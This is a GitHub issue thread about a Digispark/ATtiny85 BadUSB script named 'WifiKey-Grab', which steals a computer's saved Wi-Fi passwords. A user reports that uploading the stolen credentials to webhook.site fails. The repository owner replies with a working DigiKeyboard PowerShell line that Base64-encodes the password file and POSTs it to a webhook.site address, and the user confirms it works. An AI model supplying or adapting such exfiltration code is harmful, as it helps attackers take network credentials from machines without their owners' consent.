### ISSUE TITLE
Issue with WifiKey-Grab_Minimize-of-Shame.ino

### ISSUE THREAD

**Issue by SN33DS** [MTK911/Attiny85#7]
I get this error when digispark is trying to send the wifi info to https://webhook.site/.
Is there any way to fix this ?

Invoke-WebRequest : The remote server returned an error: (422) Unprocessable Entity.
At line:1 char:1
+ Invoke-WebRequest -Uri https://webhook.site/...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

**Comment by MTK911** [comment]
Hey @SN33DS ,
It looks like you have some characters in your Password or Wifi name which webhook.site is not liking. A small workaround would be to Base64 encode the file and send the Base64 Encoded data; Replace the invoke-webrequest line with this:
`DigiKeyboard.println("powershell $fil=(Join-Path (pwd) 'Wi-Fi-PASS');[IO.File]::WriteAllText(($fil),([convert]::ToBase64String(([IO.File]::ReadAllBytes($fil))))); Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS");`
What it will do is it will convert all the content to base64 and save it again on Wi-Fi-PASS file and send the encoded data. Than you can Base64 decode the data on webhook.site manually.
Hope it helps.

**Comment by SN33DS** [comment]
Hey @MTK911, Thanks a lot for your answer, it worked perfectly !
